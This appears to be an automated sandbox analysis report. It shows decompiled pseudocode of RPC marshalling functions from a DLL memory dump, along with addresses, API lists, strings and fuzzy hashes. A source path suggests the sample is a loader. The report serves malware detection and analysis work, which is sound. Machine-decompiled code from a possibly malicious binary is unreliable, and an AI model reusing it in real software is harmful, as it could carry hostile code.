						__eax = _v16;
						return _v16;
					case 2:
						1 = 1 << 0;
						__eax = _a16;
						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
						_v5 = __cl;
						_a16 = _a16 + 4;
						__eax = _a8;
						_a16 = E6EDAA440(_a8, _a16 + 4);
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _a16;
						__ecx = _a8;
						_a16 = E6EDAA540(_a8, _a8, _a16,  *(_a8 + 0x3c));
						__edx = _a16;
						_push(_a16);
						__eax = _a8;
						_push(_a8);
						0x6eda0000();
						__esp = __esp + 8;
						_v12 = __ax;
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if(__eflags == 0) {
							_push(0xab4);
							__eax = E6EDAFA71(__ebx, __edx, __edi, __esi, __eflags, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\fb11756e47a4488bb45f8c56ea0c6221\\Loader\\Project4\\Project4\\Source.c");
						}
						__eax = _a20 & 0x000000ff;
						__eflags = _a20 & 0x000000ff;
						if((_a20 & 0x000000ff) == 0) {
							__ecx = _a12;
							__eflags =  *_a12;
							if( *_a12 == 0) {
								_a20 = 1;
							}
						}
						__edx = _a20 & 0x000000ff;
						__eflags = _a20 & 0x000000ff;
						if((_a20 & 0x000000ff) != 0) {
							__eax = _v24;
							__ecx = _a8;
							__eax = E6EDAA3B0(_a8, _a8, _v24);
							__edx = _a12;
							 *_a12 = __eax;
						}
						__eax = _v5 & 0x000000ff;
						__ecx = _a8;
						__ecx = _a8 + 4;
						__eax = E6EDA73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
						__edx = _a8;
						__eax =  *(__edx + 4);
						_v20 =  *(__edx + 4);
						__ecx = _a12;
						__edx =  *_a12;
						_v36 =  *_a12;
						__eax = _a8;
						__ecx =  *(__eax + 0x44);
						_v44 =  *(__eax + 0x44);
						_v32 = 0;
						while(1) {
							__eax = _v32;
							__eflags = _v32 - _v44;
							if(_v32 >= _v44) {
								break;
							}
							__ecx = _a20 & 0x000000ff;
							__edx = _a16;
							__eax = _v36;
							__ecx = _a8;
							_v36 = E6EDA9560(_a8, _v36, _a16, 0, _a20 & 0x000000ff);
							__edx = _v32;
							__edx = _v32 + 1;
							__eflags = __edx;
							_v32 = __edx;
						}
						__edx = _a8;
						 *(__edx + 4) =  *(__edx + 4) - _v20;
						return  *(__edx + 4) - _v20;
					case 3:
						__eax = _a4 & 0x000000ff;
						__eflags = (_a4 & 0x000000ff) - 0x22;
						if((_a4 & 0x000000ff) != 0x22) {
							__edx = 2;
							_v12 = __dx;
						} else {
							__ecx = 1;
							_v12 = __cx;
						}
						__eax = _a8;
						__ecx =  *(_a8 + 0x3c);
						__edx = _a8;
						E6EDAA540( *(_a8 + 0x3c), _a8, 0,  *(_a8 + 0x3c)) = 1;
						__eax = 1 << 0;
						__ecx = _a16;
						__edx =  *(__ecx + (1 << 0)) & 0x000000ff;
						__eflags = ( *(__ecx + (1 << 0)) & 0x000000ff) - 0x44;
						if(( *(__ecx + (1 << 0)) & 0x000000ff) != 0x44) {
							__eax = _a8;
							__ecx = _a8;
							__edx =  *(__eax + 0x3c);
							__eflags =  *(__eax + 0x3c) -  *((intOrPtr*)(__ecx + 0x44));
							if( *(__eax + 0x3c) !=  *((intOrPtr*)(__ecx + 0x44))) {
								__eax = _a8;
								__ecx =  *(__eax + 0x3c);
								_push( *(__eax + 0x3c));
								__edx = _a8;
								__eax =  *(__edx + 0x44);
								_push( *(__edx + 0x44));
								_push("buffer size %d must equal memory size %ld for non-sized conformant strings\n");
								0x6eda0000();
								__esp = __esp + 0xc;
								_push(0x6c6);
								__imp__RpcRaiseException();
							}
						}
						__ecx = _a8;
						__eflags =  *(__ecx + 0x40);
						if( *(__ecx + 0x40) != 0) {
							__edx = _a8;
							__eax =  *(__edx + 0x40);
							_push( *(__edx + 0x40));
							_push("conformant strings can\'t have Offset (%d)\n");
							0x6eda0000();
							__esp = __esp + 8;
							_push(0x6c6);
							__imp__RpcRaiseException();
						}
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a8;
						__edx =  *(_a8 + 0x44);
						__eax = _v12 & 0x0000ffff;
						_v16 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
						__ecx = _v12 & 0x0000ffff;
						__edx = _v16;
						_a8 = E6EDAB0C0(_v12 & 0x0000ffff, _a8, _v16, _v12 & 0x0000ffff);
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if((_a28 & 0x000000ff) == 0) {
							L44:
							__eax = _v16;
							return _v16;
						} else {
							__edx = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) == 0) {
								__eax = _a24 & 0x000000ff;
								__eflags = _a24 & 0x000000ff;
								if((_a24 & 0x000000ff) == 0) {
									L36:
									__ecx = _a12;
									__eflags =  *_a12;
									if( *_a12 == 0) {
										__edx = _v24;
										_push(_v24);
										__eax = _a8;
										_push(__eax);
										__imp__NdrAllocate();
										__ecx = _a12;
										 *_a12 = __eax;
									}
									L38:
									__edx = _a12;
									__eax = _a8;
									__ecx =  *_a12;
									__eflags =  *_a12 -  *((intOrPtr*)(__eax + 4));
									if( *_a12 !=  *((intOrPtr*)(__eax + 4))) {
										__ecx = _v16;
										__edx = _a12;
										__eax =  *_a12;
										__ecx = _a8;
										__eax = E6EDAAFA0(_a8,  *_a12, _v16);
									} else {
										__edx = _v16;
										_a8 = E6EDAAF00(_a8, _v16);
									}
									__edx = _a16;
									__eax =  *_a16 & 0x000000ff;
									__eflags = __eax - 0x22;
									if(__eax != 0x22) {
										__eax = _a12;
										__ecx =  *__eax;
										_push( *__eax);
										0x6eda0000();
										__esp = __esp + 4;
										_push(__eax);
										_push("string=%s\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__ecx = _a12;
										__edx =  *_a12;
										_push( *_a12);
										0x6eda0000();
										__esp = __esp + 4;
										_push(__eax);
										_push("string=%s\n");
										0x6eda0000();
										__esp = __esp + 8;
									}
									goto L44;
								}
								__ecx = _a8;
								__edx =  *(__ecx + 0x20) & 0x000000ff;
								__eflags =  *(__ecx + 0x20) & 0x000000ff;
								if(( *(__ecx + 0x20) & 0x000000ff) != 0) {
									goto L36;
								}
								__eax = _a12;
								__eflags =  *_a12;
								if( *_a12 != 0) {
									goto L36;
								}
								__ecx = _a8;
								__edx = _a8;
								__eax =  *(__ecx + 0x3c);
								__eflags =  *(__ecx + 0x3c) -  *(__edx + 0x44);
								if( *(__ecx + 0x3c) !=  *(__edx + 0x44)) {
									goto L36;
								}
								__ecx = _a12;
								__edx = _a8;
								__eax =  *(__edx + 4);
								 *_a12 =  *(__edx + 4);
								goto L38;
							}
							__eax = _v24;
							_push(__eax);
							__ecx = _a8;
							_push(_a8);
							__imp__NdrAllocate();
							__edx = _a12;
							 *_a12 = __eax;
							goto L38;
						}
					case 4:
						goto L57;
				}
			}














                                                                                                0x6edad83a
                                                                                                0x6edad843
                                                                                                0x6edad84a
                                                                                                0x6edadde7
                                                                                                0x6edadde7
                                                                                                0x6edaddf1
                                                                                                0x6edaddfe
                                                                                                0x00000000
                                                                                                0x6edaddfe
                                                                                                0x6edad853
                                                                                                0x6edad85a
                                                                                                0x00000000
                                                                                                0x6edad868
                                                                                                0x6edad87e
                                                                                                0x6edad895
                                                                                                0x6edad89b
                                                                                                0x6edad8b1
                                                                                                0x6edad8c0
                                                                                                0x6edad8c5
                                                                                                0x6edad8ce
                                                                                                0x6edad991
                                                                                                0x00000000
                                                                                                0x6edad8d4
                                                                                                0x6edad8da
                                                                                                0x6edad8f7
                                                                                                0x6edad8f9
                                                                                                0x6edad8fb
                                                                                                0x6edad902
                                                                                                0x6edad904
                                                                                                0x6edad909
                                                                                                0x6edad90c
                                                                                                0x6edad917
                                                                                                0x6edad917
                                                                                                0x6edad90c
                                                                                                0x6edad904
                                                                                                0x6edad8dc
                                                                                                0x6edad8e4
                                                                                                0x6edad8e9
                                                                                                0x6edad8ef
                                                                                                0x6edad8ef
                                                                                                0x6edad91f
                                                                                                0x6edad92a
                                                                                                0x6edad938
                                                                                                0x6edad952
                                                                                                0x6edad95f
                                                                                                0x6edad963
                                                                                                0x6edad964
                                                                                                0x6edad969
                                                                                                0x6edad979
                                                                                                0x6edad989
                                                                                                0x6edad98e
                                                                                                0x00000000
                                                                                                0x6edad979
                                                                                                0x00000000
                                                                                                0x6edad999
                                                                                                0x6edad99c
                                                                                                0x6edad9a0
                                                                                                0x6edad9a9
                                                                                                0x6edad9ac
                                                                                                0x6edad9b3
                                                                                                0x6edad9b6
                                                                                                0x6edad9bc
                                                                                                0x6edad9c0
                                                                                                0x6edad9cc
                                                                                                0x6edad9cf
                                                                                                0x6edad9d2
                                                                                                0x6edad9d6
                                                                                                0x6edad9da
                                                                                                0x6edad9e6
                                                                                                0x6edad9e9
                                                                                                0x6edad9f1
                                                                                                0x6edad9f5
                                                                                                0x6edad9fd
                                                                                                0x6edada00
                                                                                                0x6edada04
                                                                                                0x6edada11
                                                                                                0x6edada14
                                                                                                0x6edada17
                                                                                                0x6edada1b
                                                                                                0x6edada28
                                                                                                0x6edada2b
                                                                                                0x6edada2f
                                                                                                0x6edada31
                                                                                                0x6edada37
                                                                                                0x6edada3a
                                                                                                0x6edada3d
                                                                                                0x6edada40
                                                                                                0x6edada44
                                                                                                0x6edada46
                                                                                                0x6edada48
                                                                                                0x6edada4b
                                                                                                0x6edada4e
                                                                                                0x6edada50
                                                                                                0x6edada50
                                                                                                0x6edada4e
                                                                                                0x6edada54
                                                                                                0x6edada58
                                                                                                0x6edada5a
                                                                                                0x6edada5c
                                                                                                0x6edada60
                                                                                                0x6edada64
                                                                                                0x6edada6c
                                                                                                0x6edada6f
                                                                                                0x6edada6f
                                                                                                0x6edada71
                                                                                                0x6edada74
                                                                                                0x6edada77
                                                                                                0x6edada7a
                                                                                                0x6edada7e
                                                                                                0x6edada8a
                                                                                                0x6edada8d
                                                                                                0x6edada90
                                                                                                0x6edada93
                                                                                                0x6edada98
                                                                                                0x6edada9c
                                                                                                0x6edada9f
                                                                                                0x6edadaa2
                                                                                                0x6edadaa6
                                                                                                0x6edadaaa
                                                                                                0x6edadab2
                                                                                                0x6edadab6
                                                                                                0x6edadaba
                                                                                                0x6edadabf
                                                                                                0x6edadabf
                                                                                                0x6edadac3
                                                                                                0x6edadac8
                                                                                                0x6edadacb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadcb9
                                                                                                0x6edadcbc
                                                                                                0x6edadcc3
                                                                                                0x6edadcc6
                                                                                                0x6edadccc
                                                                                                0x6edadcd0
                                                                                                0x6edadcdc
                                                                                                0x6edadcdf
                                                                                                0x6edadce2
                                                                                                0x6edadce6
                                                                                                0x6edadcea
                                                                                                0x6edadcf6
                                                                                                0x6edadcf9
                                                                                                0x6edadcfc
                                                                                                0x6edadcfd
                                                                                                0x6edadd00
                                                                                                0x6edadd01
                                                                                                0x6edadd06
                                                                                                0x6edadd09
                                                                                                0x6edadd0d
                                                                                                0x6edadd10
                                                                                                0x6edadd14
                                                                                                0x6edadd21
                                                                                                0x6edadd24
                                                                                                0x6edadd28
                                                                                                0x6edadd2a
                                                                                                0x6edadd2c
                                                                                                0x6edadd3b
                                                                                                0x6edadd40
                                                                                                0x6edadd43
                                                                                                0x6edadd47
                                                                                                0x6edadd49
                                                                                                0x6edadd4b
                                                                                                0x6edadd4e
                                                                                                0x6edadd51
                                                                                                0x6edadd53
                                                                                                0x6edadd53
                                                                                                0x6edadd51
                                                                                                0x6edadd57
                                                                                                0x6edadd5b
                                                                                                0x6edadd5d
                                                                                                0x6edadd5f
                                                                                                0x6edadd63
                                                                                                0x6edadd67
                                                                                                0x6edadd6f
                                                                                                0x6edadd72
                                                                                                0x6edadd72
                                                                                                0x6edadd74
                                                                                                0x6edadd79
                                                                                                0x6edadd7c
                                                                                                0x6edadd80
                                                                                                0x6edadd88
                                                                                                0x6edadd8b
                                                                                                0x6edadd8e
                                                                                                0x6edadd91
                                                                                                0x6edadd94
                                                                                                0x6edadd96
                                                                                                0x6edadd99
                                                                                                0x6edadd9c
                                                                                                0x6edadd9f
                                                                                                0x6edadda2
                                                                                                0x6edaddb4
                                                                                                0x6edaddb4
                                                                                                0x6edaddb7
                                                                                                0x6edaddba
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edaddbc
                                                                                                0x6edaddc3
                                                                                                0x6edaddc7
                                                                                                0x6edaddcb
                                                                                                0x6edaddd7
                                                                                                0x6edaddab
                                                                                                0x6edaddae
                                                                                                0x6edaddae
                                                                                                0x6edaddb1
                                                                                                0x6edaddb1
                                                                                                0x6edadddc
                                                                                                0x6edadde2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadad3
                                                                                                0x6edadad7
                                                                                                0x6edadada
                                                                                                0x6edadae7
                                                                                                0x6edadaec
                                                                                                0x6edadadc
                                                                                                0x6edadadc
                                                                                                0x6edadae1
                                                                                                0x6edadae1
                                                                                                0x6edadaf0
                                                                                                0x6edadaf3
                                                                                                0x6edadaf9
                                                                                                0x6edadb05
                                                                                                0x6edadb0a
                                                                                                0x6edadb0d
                                                                                                0x6edadb10
                                                                                                0x6edadb14
                                                                                                0x6edadb17
                                                                                                0x6edadb19
                                                                                                0x6edadb1c
                                                                                                0x6edadb1f
                                                                                                0x6edadb22
                                                                                                0x6edadb25
                                                                                                0x6edadb27
                                                                                                0x6edadb2a
                                                                                                0x6edadb2d
                                                                                                0x6edadb2e
                                                                                                0x6edadb31
                                                                                                0x6edadb34
                                                                                                0x6edadb35
                                                                                                0x6edadb3a
                                                                                                0x6edadb3f
                                                                                                0x6edadb42
                                                                                                0x6edadb47
                                                                                                0x6edadb47
                                                                                                0x6edadb25
                                                                                                0x6edadb4d
                                                                                                0x6edadb50
                                                                                                0x6edadb54
                                                                                                0x6edadb56
                                                                                                0x6edadb59
                                                                                                0x6edadb5c
                                                                                                0x6edadb5d
                                                                                                0x6edadb62
                                                                                                0x6edadb67
                                                                                                0x6edadb6a
                                                                                                0x6edadb6f
                                                                                                0x6edadb6f
                                                                                                0x6edadb75
                                                                                                0x6edadb78
                                                                                                0x6edadb7c
                                                                                                0x6edadb89
                                                                                                0x6edadb8c
                                                                                                0x6edadb8f
                                                                                                0x6edadb93
                                                                                                0x6edadba0
                                                                                                0x6edadba3
                                                                                                0x6edadba8
                                                                                                0x6edadbb0
                                                                                                0x6edadbb8
                                                                                                0x6edadbbc
                                                                                                0x6edadbbe
                                                                                                0x6edadcac
                                                                                                0x6edadcac
                                                                                                0x00000000
                                                                                                0x6edadbc4
                                                                                                0x6edadbc4
                                                                                                0x6edadbc8
                                                                                                0x6edadbca
                                                                                                0x6edadbe1
                                                                                                0x6edadbe5
                                                                                                0x6edadbe7
                                                                                                0x6edadc17
                                                                                                0x6edadc17
                                                                                                0x6edadc1a
                                                                                                0x6edadc1d
                                                                                                0x6edadc1f
                                                                                                0x6edadc22
                                                                                                0x6edadc23
                                                                                                0x6edadc26
                                                                                                0x6edadc27
                                                                                                0x6edadc2d
                                                                                                0x6edadc30
                                                                                                0x6edadc30
                                                                                                0x6edadc32
                                                                                                0x6edadc32
                                                                                                0x6edadc35
                                                                                                0x6edadc38
                                                                                                0x6edadc3a
                                                                                                0x6edadc3d
                                                                                                0x6edadc51
                                                                                                0x6edadc55
                                                                                                0x6edadc58
                                                                                                0x6edadc5b
                                                                                                0x6edadc5f
                                                                                                0x6edadc3f
                                                                                                0x6edadc3f
                                                                                                0x6edadc47
                                                                                                0x6edadc4c
                                                                                                0x6edadc67
                                                                                                0x6edadc6a
                                                                                                0x6edadc6d
                                                                                                0x6edadc70
                                                                                                0x6edadc90
                                                                                                0x6edadc93
                                                                                                0x6edadc95
                                                                                                0x6edadc96
                                                                                                0x6edadc9b
                                                                                                0x6edadc9e
                                                                                                0x6edadc9f
                                                                                                0x6edadca4
                                                                                                0x6edadca9
                                                                                                0x6edadc72
                                                                                                0x6edadc72
                                                                                                0x6edadc75
                                                                                                0x6edadc77
                                                                                                0x6edadc78
                                                                                                0x6edadc7d
                                                                                                0x6edadc80
                                                                                                0x6edadc81
                                                                                                0x6edadc86
                                                                                                0x6edadc8b
                                                                                                0x6edadc8b
                                                                                                0x00000000
                                                                                                0x6edadc70
                                                                                                0x6edadbe9
                                                                                                0x6edadbec
                                                                                                0x6edadbf0
                                                                                                0x6edadbf2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadbf4
                                                                                                0x6edadbf7
                                                                                                0x6edadbfa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadbfc
                                                                                                0x6edadbff
                                                                                                0x6edadc02
                                                                                                0x6edadc05
                                                                                                0x6edadc08
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadc0a
                                                                                                0x6edadc0d
                                                                                                0x6edadc10
                                                                                                0x6edadc13
                                                                                                0x00000000
                                                                                                0x6edadc13
                                                                                                0x6edadbcc
                                                                                                0x6edadbcf
                                                                                                0x6edadbd0
                                                                                                0x6edadbd3
                                                                                                0x6edadbd4
                                                                                                0x6edadbda
                                                                                                0x6edadbdd
                                                                                                0x00000000
                                                                                                0x6edadbdd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 6EDAD989
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,?,6EDA3992,?), ref: 6EDADDFE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: copying %p to %p$unknown array format 0x%x
                                                                                                • API String ID: 4056999889-2029649059
                                                                                                • Opcode ID: 047cb781484906954ea2ec8738ab1d7733ecaea259bd70c7e4c2a07a7f80fa71
                                                                                                • Instruction ID: 990623ca08f11278e996ef68157bdf7052333d24fed5735807ef511ed4110de1
                                                                                                • Opcode Fuzzy Hash: 047cb781484906954ea2ec8738ab1d7733ecaea259bd70c7e4c2a07a7f80fa71
                                                                                                • Instruction Fuzzy Hash: CBA17FB5A04149AFCB44CFA8D8909AE7BB5BF89308F04C559FD599B341E335EA11CBB0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA1440, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 224COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 21%
                                                                                                			E6EDA1440(void* _a4, signed int* _a8, signed short* _a12) {
				signed char* _v8;
				signed char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t147;
				signed short* _t162;
				intOrPtr _t225;
				void* _t262;
				void* _t263;
				void* _t264;
				void* _t265;

				_v8 = 0;
				_v12 = 0;
				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
				_v28 = 0;
				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
				_t263 = _t262 + 0x10;
				_t225 = _a4;
				_t267 =  *((intOrPtr*)(_t225 + 0x34));
				if( *((intOrPtr*)(_t225 + 0x34)) == 0) {
					_v32 =  *((intOrPtr*)(_a4 + 0x30));
					_v36 =  *((intOrPtr*)(_a4 + 0x14));
					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6EDA5070(_t267, _a4, _a8, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v32;
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14));
					0x6eda0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) -  *((intOrPtr*)(_a4 + 4)));
					_t263 = _t263 + 8;
					_v28 = 1;
					 *((intOrPtr*)(_a4 + 0x14)) = _v36;
				}
				E6EDA7400(_a4 + 4, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t264 = _t263 + 8;
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v12 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
				if(_v8 != 0) {
					_t162 = _a12;
					0x6eda0000(_a4, _t162);
					_v40 = _t162;
					E6EDAD120( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
					_t264 = _t264 + 0x18;
					_v16 =  *((intOrPtr*)(_a4 + 0x3c));
					_v20 =  *((intOrPtr*)(_a4 + 0x44));
					_v24 =  *((intOrPtr*)(_a4 + 0x40));
				}
				_t147 = E6EDA8F30(_a4, _a8, _a12, _v12);
				_t265 = _t264 + 0x10;
				_a8 = _t147;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v16;
					 *((intOrPtr*)(_a4 + 0x44)) = _v20;
					 *((intOrPtr*)(_a4 + 0x40)) = _v24;
					E6EDAD360( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
					_t265 = _t265 + 0x14;
				}
				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
				if(_v28 != 0) {
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
					 *((intOrPtr*)(_a4 + 0x34)) = 0;
				}
				do {
					0x6eda0000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
					_t265 = _t265 + 0xc;
					if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
						0x6eda0000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
						_t265 = _t265 + 8;
					}
				} while (0 != 0);
				return 0;
			}




















                                                                                                0x6eda1446
                                                                                                0x6eda144d
                                                                                                0x6eda145a
                                                                                                0x6eda145d
                                                                                                0x6eda1464
                                                                                                0x6eda146b
                                                                                                0x6eda1472
                                                                                                0x6eda148a
                                                                                                0x6eda148f
                                                                                                0x6eda1492
                                                                                                0x6eda1495
                                                                                                0x6eda1499
                                                                                                0x6eda14a5
                                                                                                0x6eda14ae
                                                                                                0x6eda14c2
                                                                                                0x6eda14c8
                                                                                                0x6eda14db
                                                                                                0x6eda14e6
                                                                                                0x6eda14fa
                                                                                                0x6eda150f
                                                                                                0x6eda1514
                                                                                                0x6eda1517
                                                                                                0x6eda1524
                                                                                                0x6eda1524
                                                                                                0x6eda1541
                                                                                                0x6eda1546
                                                                                                0x6eda154f
                                                                                                0x6eda155a
                                                                                                0x6eda1565
                                                                                                0x6eda1565
                                                                                                0x6eda156e
                                                                                                0x6eda1579
                                                                                                0x6eda1584
                                                                                                0x6eda1584
                                                                                                0x6eda158d
                                                                                                0x6eda1596
                                                                                                0x6eda159d
                                                                                                0x6eda159f
                                                                                                0x6eda15a7
                                                                                                0x6eda15af
                                                                                                0x6eda15d1
                                                                                                0x6eda15d6
                                                                                                0x6eda15df
                                                                                                0x6eda15e8
                                                                                                0x6eda15f1
                                                                                                0x6eda15f1
                                                                                                0x6eda1604
                                                                                                0x6eda1609
                                                                                                0x6eda160c
                                                                                                0x6eda1613
                                                                                                0x6eda161b
                                                                                                0x6eda1624
                                                                                                0x6eda162d
                                                                                                0x6eda164e
                                                                                                0x6eda1653
                                                                                                0x6eda1653
                                                                                                0x6eda165c
                                                                                                0x6eda1663
                                                                                                0x6eda166e
                                                                                                0x6eda1674
                                                                                                0x6eda1674
                                                                                                0x6eda167b
                                                                                                0x6eda1696
                                                                                                0x6eda169b
                                                                                                0x6eda16b2
                                                                                                0x6eda16d0
                                                                                                0x6eda16d5
                                                                                                0x6eda16d5
                                                                                                0x6eda16d8
                                                                                                0x6eda16e1

                                                                                                APIs
                                                                                                • _NdrComplexStructBufferSize@12.SOZZ(00000000,00000000,00000000), ref: 6EDA14DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: BufferComplexSize@12Struct
                                                                                                • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x
                                                                                                • API String ID: 1319815426-1841717460
                                                                                                • Opcode ID: 5c01ae2f83278513e513ada470f1f2d6280f26fcb4de457532425256e96c91bb
                                                                                                • Instruction ID: 29f6def6865f87a760bb96e143d4613e8b8601c347ed963d4e318b85667b5813
                                                                                                • Opcode Fuzzy Hash: 5c01ae2f83278513e513ada470f1f2d6280f26fcb4de457532425256e96c91bb
                                                                                                • Instruction Fuzzy Hash: 18A1D8B4A00209EFCB48CF98C590AAEBBB5FF88354F148558ED599B345D731EA91CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAED20, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • buffer overflow - saved_buffer = %p, BufferEnd = %p, xrefs: 6EDAEE65
                                                                                                • buffer overflow %d bytes, xrefs: 6EDAEEFA
                                                                                                • buffer=%d/%d, xrefs: 6EDAEEC0
                                                                                                • no marshaller for embedded type %02x, xrefs: 6EDAEF64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer overflow - saved_buffer = %p, BufferEnd = %p$buffer=%d/%d$no marshaller for embedded type %02x
                                                                                                • API String ID: 3997070919-2685964157
                                                                                                • Opcode ID: 4b66d287588d5459a043c7bc99351cb447582f49fa155c09e0facc26dd03acce
                                                                                                • Instruction ID: e09fc98da3c91d2800e2227fbccae0f727b953d3c69b3029485840f0545f33d3
                                                                                                • Opcode Fuzzy Hash: 4b66d287588d5459a043c7bc99351cb447582f49fa155c09e0facc26dd03acce
                                                                                                • Instruction Fuzzy Hash: 94811AB4A04109EFCB04CF98C490AAEBBB6EF89344F14C158FD599B355D731EA91CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAEAA0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 195COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • buffer=%d/%d, xrefs: 6EDAEC03
                                                                                                • buffer overflow - saved_buffer = %p, BufferEnd = %p, xrefs: 6EDAEC85
                                                                                                • buffer overflow %d bytes, xrefs: 6EDAEC3D
                                                                                                • no marshaller for embedded type %02x, xrefs: 6EDAECE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
